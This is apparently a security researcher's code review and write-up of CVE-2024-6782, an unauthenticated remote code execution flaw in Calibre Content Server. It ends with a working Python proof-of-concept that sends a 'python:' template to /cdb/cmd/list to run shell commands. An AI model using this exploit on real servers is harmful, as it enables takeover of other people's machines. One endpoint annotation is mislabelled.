Calibre CVE: CVE-2024-6782

Table of Contents

[TOC]

Info

CVE Info

Title Description
Vendor Calibre
Severity Critical
Versions 6.9.0 ~ 7.14.0
CVE Description Improper Access Control in Calibre Content Server allows remote code execution
NIST Description Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution.
CWE Classification(s) CWE-863: Incorrect Authorization
CAPEC Classification(s) CAPEC-253: Remote Code Inclusion
CVSS 3.x Severity 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
MITRE Date Record Created 20240716

Reference:

Code Review

src/calibre/db/cli/cmd.list.py

1. SQL fields 資料庫設定

readonly = True
version = 0  # change this if you change signature of implementation()
FIELDS = {
    'title', 'authors', 'author_sort', 'publisher', 'rating', 'timestamp', 'size',
    'tags', 'comments', 'series', 'series_index', 'formats', 'isbn', 'uuid',
    'pubdate', 'cover', 'last_modified', 'identifiers', 'languages', 'template'
}

fields name record
readonly

2. ebook format & path: formats() & cover()

def formats(db, book_id):
    for fmt in db.formats(book_id, verify_formats=False):
        path = db.format_abspath(book_id, fmt)
        if path:
            yield path.replace(os.sep, '/')


def cover(db, book_id):
    return db.format_abspath(book_id, '__COVER_INTERNAL__')

Ebook format (db, bookid), 封面
file 絕對路徑

3. sort fields: implementation(): 從資料庫中查書,回傳JSON

def implementation(
    db, notify_changes, fields, sort_by, ascending, search_text, limit, template=None
):
    is_remote = notify_changes is not None
    formatter = None
    with db.safe_read_lock:
        fm = db.field_metadata
        afields = set(FIELDS) | {'id'}
        for k in fm.custom_field_keys():
            afields.add('*' + k[1:])
        if 'all' in fields:
            fields = sorted(afields if template else (afields - {'template'}))
        sort_by = sort_by or 'id'
        sort_fields = sort_by.split(',')
        for sf in sort_fields:
            if sf not in afields:
                return f'Unknown sort field: {sf}'
        sort_spec = [(sf, ascending) for sf in sort_fields]
        if not set(fields).issubset(afields):
            return 'Unknown fields: {}'.format(', '.join(set(fields) - afields))
        if search_text:
            book_ids = db.multisort(sort_spec, ids_to_sort=db.search(search_text))
        else:
            book_ids = db.multisort(sort_spec)
        if limit > -1:
            book_ids = book_ids[:limit]
        data = {}
        metadata = {}
        for field in fields:
            if field in 'id':
                continue
            if field == 'isbn':
                x = db.all_field_for('identifiers', book_ids, default_value={})
                data[field] = {k: v.get('isbn') or '' for k, v in iteritems(x)}
                continue
            if field == 'template':
                vals = {}
                global_vars = {}
                if formatter is None:
                    from calibre.ebooks.metadata.book.formatter import SafeFormat
                    formatter = SafeFormat()
                for book_id in book_ids:
                    mi = db.get_proxy_metadata(book_id)
                    vals[book_id] = formatter.safe_format(template, {}, 'TEMPLATE ERROR', mi, global_vars=global_vars)
                data['template'] = vals
                continue
            field = field.replace('*', '#')
            metadata[field] = fm[field]
            if not is_remote:
                if field == 'formats':
                    data[field] = {k: list(formats(db, k)) for k in book_ids}
                    continue
                if field == 'cover':
                    data[field] = {k: cover(db, k) for k in book_ids}
                    continue
            data[field] = db.all_field_for(field, book_ids)
    return {'book_ids': book_ids, "data": data, 'metadata': metadata, 'fields':fields}

(v.7.21.0) 檢查 notify_changes , 遠端執行禁用 template\

驗證 afields(所有欄位) 提取資料:

(1) id: 忽略 id (2) identifiers: 從 identifiers 取 isbn (3) template: 如果未禁用,設定 SafeFormat()格式化工具 (4) field name: * replace # (5) formats call 上方 formats() 檔案格式路徑 (6) cover call 上方 cover() 封面檔案路徑

fields & book_ids structure example:

{
    'title': {101: 'Harry Potter', 102: 'The Hobbit', 103: '1984'},
    'author': {101: 'J.K. Rowling', 102: 'J.R.R. Tolkien', 103: 'George Orwell'},
    'isbn': {101: '9780747532743', 102: '9780547928227', 103: '9780451524935'}
}

4. do_list() 輸出格式

def do_list(
    dbctx,
    fields,
    afields,
    sort_by,
    ascending,
    search_text,
    line_width,
    separator,
    prefix,
    limit,
    template,
    template_file,
    template_title,
    for_machine=False
):
  • CLI option_parser(): 列出書籍
    • --fields: 顯示指定欄位 (*authors)
    • --sort-by: 排序
    • --ascending: 升降冪
    • --search: 搜尋條件
    • --line-width: single line 寬度
    • --separator: 分隔字串的符號
    • --prefix: 檔案路徑的前綴
    • --limit: 限制顯示數量
    • --for-machine: output JSON
    • --template 和 --template_file: 指定 template 路徑
    • --template_heading: template title

src/calibre/srv/cdb.py

REST API

1. cdb_run: command module

@endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache') {which}: module name
{version=0}: module version

@endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_run(ctx, rd, which, version):
    try:
        m = module_for_cmd(which)
    except ImportError:
        raise HTTPNotFound(f'No module named: {which}')
    if not getattr(m, 'readonly', False):
        ctx.check_for_write_access(rd)
    if getattr(m, 'version', 0) != int(version):
        raise HTTPNotFound(('The module {} is not available in version: {}.'
                           'Make sure the version of calibre used for the'
                            ' server and calibredb match').format(which, version))
    db = get_library_data(ctx, rd, strict_library_id=True)[0]
    if ctx.restriction_for(rd, db):
        raise HTTPForbidden('Cannot use the command-line db interface with a user who has per library restrictions')
    raw = rd.read()
    ct = rd.inheaders.get('Content-Type', all=True)
    ct = {x.lower().partition(';')[0] for x in ct}
    try:
        if MSGPACK_MIME in ct:
            args = msgpack_loads(raw)
        elif 'application/json' in ct:
            args = json_loads(raw)
        else:
            raise HTTPBadRequest('Only JSON or msgpack requests are supported')
    except Exception:
        raise HTTPBadRequest('args are not valid encoded data')
    if getattr(m, 'needs_srv_ctx', False):
        args = [ctx] + list(args)
    try:
        result = m.implementation(db, partial(ctx.notify_changes, db.backend.library_path), *args)
    except Exception as err:
        tb = ''
        if not getattr(err, 'suppress_traceback', False):
            import traceback
            tb = traceback.format_exc()
        return {'err': as_unicode(err), 'tb': tb}
    return {'result': result}

驗證寫入權限、版本、library_id、user權限
HTTP response (Content-Type: msgpack or JSON)
呼叫 implementation(): db, ctx.notify_changes, args

result = m.implementation(db, partial(ctx.notify_changes, db.backend.library_path), *args)

2. cdb_add_book: Add book

@endpoint('/cdb/add-book/{job_id}/{add_duplicates}/{filename}/{library_id=None}', needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache') {job_id}:task ID
{add_duplicates}:新增重複書籍
{filename}:書籍名稱
{library_id}:指定目標書庫

@endpoint('/cdb/add-book/{job_id}/{add_duplicates}/{filename}/{library_id=None}',
          needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
def cdb_add_book(ctx, rd, job_id, add_duplicates, filename, library_id):
    '''
    Add a file as a new book. The file contents must be in the body of the request.

    The response will also have the title/authors/languages read from the
    metadata of the file/filename. It will contain a `book_id` field specifying
    the id of the newly added book, or if add_duplicates is not specified and a
    duplicate was found, no book_id will be present, instead there will be a
    `duplicates` field specifying the title and authors for all duplicate
    matches. It will also return the value of `job_id` as the `id` field and
    `filename` as the `filename` field.
    '''
    db = get_db(ctx, rd, library_id)
    if ctx.restriction_for(rd, db):
        raise HTTPForbidden('Cannot use the add book interface with a user who has per library restrictions')
    if not filename:
        raise HTTPBadRequest('An empty filename is not allowed')
    sfilename = sanitize_file_name(filename)
    fmt = os.path.splitext(sfilename)[1]
    fmt = fmt[1:] if fmt else None
    if not fmt:
        raise HTTPBadRequest('An filename with no extension is not allowed')
    if isinstance(rd.request_body_file, BytesIO):
        raise HTTPBadRequest('A request body containing the file data must be specified')
    add_duplicates = add_duplicates in ('y', '1')
    path = os.path.join(rd.tdir, sfilename)
    rd.request_body_file.seek(0)
    with open(path, 'wb') as f:
        shutil.copyfileobj(rd.request_body_file, f)
    from calibre.ebooks.metadata.worker import run_import_plugins
    path = run_import_plugins((path,), time.monotonic_ns(), rd.tdir)[0]
    with open(path, 'rb') as f:
        mi = get_metadata(f, stream_type=os.path.splitext(path)[1][1:], use_libprs_metadata=True)
        f.seek(0)
        nfmt = os.path.splitext(path)[1]
        fmt = nfmt[1:] if nfmt else fmt
        ids, duplicates = db.add_books([(mi, {fmt: f})], add_duplicates=add_duplicates)
    ans = {'title': mi.title, 'authors': mi.authors, 'languages': mi.languages, 'filename': filename, 'id': job_id}
    if ids:
        ans['book_id'] = ids[0]
        ctx.notify_changes(db.backend.library_path, books_added(ids))
    else:
        ans['duplicates'] = [{'title': m.title, 'authors': m.authors} for m, _ in duplicates]
    return ans

驗證 user 資料庫訪問權限
Check filename & extension name
提取書籍 metadata
檢查重複

3. cdb_delete_book: Delete book

@endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache') {book_ids}: 刪除的 book ID {library_id}: 資料庫 ID

@endpoint('/cdb/delete-books/{book_ids}/{library_id=None}',
          needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
def cdb_delete_book(ctx, rd, book_ids, library_id):
    db = get_db(ctx, rd, library_id)
    if ctx.restriction_for(rd, db):
        raise HTTPForbidden('Cannot use the delete book interface with a user who has per library restrictions')
    try:
        ids = {int(x) for x in book_ids.split(',')}
    except Exception:
        raise HTTPBadRequest(f'invalid book_ids: {book_ids}')
    db.remove_books(ids)
    ctx.notify_changes(db.backend.library_path, books_deleted(ids))
    return {}

驗證 user 資料庫訪問權限
notify_changes 通知 Server 已刪除

4. cdb_set_cover: Set cover

@endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache') {book_ids}: 設置封面的 book ID {library_id}: 資料庫 ID

@endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int},
            needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
def cdb_set_cover(ctx, rd, book_id, library_id):
    db = get_db(ctx, rd, library_id)
    if ctx.restriction_for(rd, db):
        raise HTTPForbidden('Cannot use the add book interface with a user who has per library restrictions')
    rd.request_body_file.seek(0)
    dirtied = db.set_cover({book_id: rd.request_body_file})
    ctx.notify_changes(db.backend.library_path, metadata(dirtied))
    return tuple(dirtied)

5. cdb_set_fields 編輯書籍

@endpoint('/cdb/set-fields/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache') {book_ids}: 編輯的 book ID {library_id}: 資料庫 ID

@endpoint('/cdb/set-fields/{book_id}/{library_id=None}', types={'book_id': int},
          needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_set_fields(ctx, rd, book_id, library_id):
    db = get_db(ctx, rd, library_id)
    if ctx.restriction_for(rd, db):
        raise HTTPForbidden('Cannot use the set fields interface with a user who has per library restrictions')
    data = load_payload_data(rd)
    try:
        changes, loaded_book_ids = data['changes'], frozenset(map(int, data.get('loaded_book_ids', ())))
        all_dirtied = bool(data.get('all_dirtied'))
        if not isinstance(changes, dict):
            raise TypeError('changes must be a dict')
    except Exception:
        raise HTTPBadRequest(
        '''Data must be of the form {'changes': {'title': 'New Title', ...}, 'loaded_book_ids':[book_id1, book_id2, ...]'}''')
    dirtied = set()
    cdata = changes.pop('cover', False)
    if cdata is not False:
        if cdata is not None:
            try:
                cdata = from_base64_bytes(cdata.split(',', 1)[-1])
            except Exception:
                raise HTTPBadRequest('Cover data is not valid base64 encoded data')
            try:
                fmt = what(None, cdata)
            except Exception:
                fmt = None
            if fmt not in ('jpeg', 'png'):
                raise HTTPBadRequest('Cover data must be either JPEG or PNG')
        dirtied |= db.set_cover({book_id: cdata})

    added_formats = changes.pop('added_formats', False)
    if added_formats:
        for data in added_formats:
            try:
                fmt = data['ext'].upper()
            except Exception:
                raise HTTPBadRequest('Format has no extension')
            if fmt:
                try:
                    fmt_data = from_base64_bytes(data['data_url'].split(',', 1)[-1])
                except Exception:
                    raise HTTPBadRequest('Format data is not valid base64 encoded data')
                if db.add_format(book_id, fmt, ReadOnlyFileBuffer(fmt_data)):
                    dirtied.add(book_id)
    removed_formats = changes.pop('removed_formats', False)
    if removed_formats:
        db.remove_formats({book_id: list(removed_formats)})
        dirtied.add(book_id)

    for field, value in iteritems(changes):
        dirtied |= db.set_field(field, {book_id: value})
    ctx.notify_changes(db.backend.library_path, metadata(dirtied))
    all_ids = dirtied if all_dirtied else (dirtied & loaded_book_ids)
    all_ids |= {book_id}
    return {bid: book_as_json(db, bid) for bid in all_ids}

驗證 user 資料庫訪問權限 library_id 找資料庫
載入 book file (JSON or msgpack)
新增/刪除格式: added/delete_formats = changes.pop('added/delete_formats', False)

6. cdb_copy_to_library

@endpoint('/cdb/copy-to-library/{target_library_id}/{library_id=None}', needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')

@endpoint('/cdb/copy-to-library/{target_library_id}/{library_id=None}', needs_db_write=True,
        postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_copy_to_library(ctx, rd, target_library_id, library_id):
    db_src = get_db(ctx, rd, library_id)
    db_dest = get_db(ctx, rd, target_library_id)
    if ctx.restriction_for(rd, db_src) or ctx.restriction_for(rd, db_dest):
        raise HTTPForbidden('Cannot use the copy to library interface with a user who has per library restrictions')
    data = load_payload_data(rd)
    try:
        book_ids = {int(x) for x in data['book_ids']}
        move_books = bool(data.get('move', False))
        preserve_date = bool(data.get('preserve_date', True))
        duplicate_action = data.get('duplicate_action') or 'add'
        automerge_action = data.get('automerge_action') or 'overwrite'
    except Exception:
        raise HTTPBadRequest('Invalid encoded data, must be of the form: {book_ids: [id1, id2, ..]}')
    if duplicate_action not in ('add', 'add_formats_to_existing', 'ignore'):
        raise HTTPBadRequest('duplicate_action must be one of: add, add_formats_to_existing, ignore')
    if automerge_action not in ('overwrite', 'ignore', 'new record'):
        raise HTTPBadRequest('automerge_action must be one of: overwrite, ignore, new record')
    response = {}
    identical_books_data = None
    if duplicate_action != 'add':
        identical_books_data = db_dest.data_for_find_identical_books()
    to_remove = set()
    from calibre.db.copy_to_library import copy_one_book
    for book_id in book_ids:
        try:
            rdata = copy_one_book(
                    book_id, db_src, db_dest, duplicate_action=duplicate_action, automerge_action=automerge_action,
                    preserve_uuid=move_books, preserve_date=preserve_date, identical_books_data=identical_books_data)
            if move_books:
                to_remove.add(book_id)
            response[book_id] = {'ok': True, 'payload': rdata}
        except Exception:
            import traceback
            response[book_id] = {'ok': False, 'payload': traceback.format_exc()}

    if to_remove:
        db_src.remove_books(to_remove, permanent=True)

    return response

驗證 user 資料庫訪問權限
db_src & db_dest: 來源/目標 資料庫

  1. duplicate_action 檢查重複
  2. copy_one_book(...) 刪除 src

Vulnerability Details

cdb.py 透過呼叫 REST API 可以 route cmd_list.py。因此 cdb.py 可以透過 /cdb/cmd/list 動態載入 cmd_list.py,並執行其中的 implementation() 函數。

cmd_list.py::implementation() 繞過驗證 input 身份

1. src/calibre/srv/cdb.py 載入 module

@endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_run(ctx, rd, which, version):
    try:
        m = module_for_cmd(which)
    except ImportError:
        raise HTTPNotFound(f'No module named: {which}')
    if not getattr(m, 'readonly', False):
        ctx.check_for_write_access(rd)
    if getattr(m, 'version', 0) != int(version):
        raise HTTPNotFound(('The module {} is not available in version: {}.'
                           'Make sure the version of calibre used for the'
                            ' server and calibredb match').format(which, version))

code review 解釋的 {which} 會對應請求的子路徑。
例如, /cdb/cmd/list 會導致載入 cmd_list.py
若 module 為 readonly 或 設定為 false, 就不會執行check_for_write_access(rd), 以此繞過權限驗證。

2. 偽造 template 輸入

cmd_list.py::implementation() 函數中,將 user input 當作 template 內容處理

if field == 'template':
    vals = {}
    global_vars = {}
    if formatter is None:
        from calibre.ebooks.metadata.book.formatter import SafeFormat
        formatter = SafeFormat()
    for book_id in book_ids:
        mi = db.get_proxy_metadata(book_id)
        vals[book_id] = formatter.safe_format(template, {}, 'TEMPLATE ERROR', mi, global_vars=global_vars)
    data['template'] = vals
    continue
field = field.replace('*', '#')
metadata[field] = fm[field]

只要讓 formatter.safe_format() 成功解析,可以自訂輸入 templaye 內容

3. evaluate()執行前綴

src/calibre/utils/formatter.py 使用 evaluate(),可以以 python: 開頭前綴的輸入來任意執行 code

def evaluate(self, fmt, args, kwargs, global_vars, break_reporter=None):
 if fmt.startswith('program:'):
  ans = self._eval_program(kwargs.get('$', None), fmt[8:],
         self.column_name, global_vars, break_reporter)
 elif fmt.startswith('python:'):
  ans = self._eval_python_template(fmt[7:], self.column_name)
 else:
  ans = self.vformat(fmt, args, kwargs)
  if self.strip_results:
   ans = self.compress_spaces.sub(' ', ans)
 if self.strip_results:
  ans = ans.strip(' ')
 return ans

Proof-of-Concept (Ref: starlabs)

#! /usr/bin/env python3
# PoC for: CVE-2024-6782
# Description: Unauthenticated remote code execution in calibre <= 7.14.0
# Written by: Amos Ng (@LFlare)
import json
import sys

import requests

_target = "http://localhost:8080"

def exploit(cmd):
    r = requests.post(
        f"{_target}/cdb/cmd/list",
        headers={"Content-Type": "application/json"},
        json=[
            ["template"],
            "", # sortby: leave empty
            "", # ascending: leave empty
            "", # search_text: leave empty, set to all
            1, # limit results
            f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()", # payload
        ],
    )

    try:
        print(list(r.json()["result"]["data"]["template"].values())[0])
    except Exception as e:
        print(r.text)

if __name__ == "__main__":
    exploit("whoami")

template 內容

python:def evaluate(a, b):
    import subprocess
    try:
        return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()
    except Exception:
        return subprocess.check_output(['sh', '-c', '{cmd}']).decode()

Patch

https://github.com/kovidgoyal/calibre/commit/38a1bf50d8cd22052ae59c513816706c6445d5e9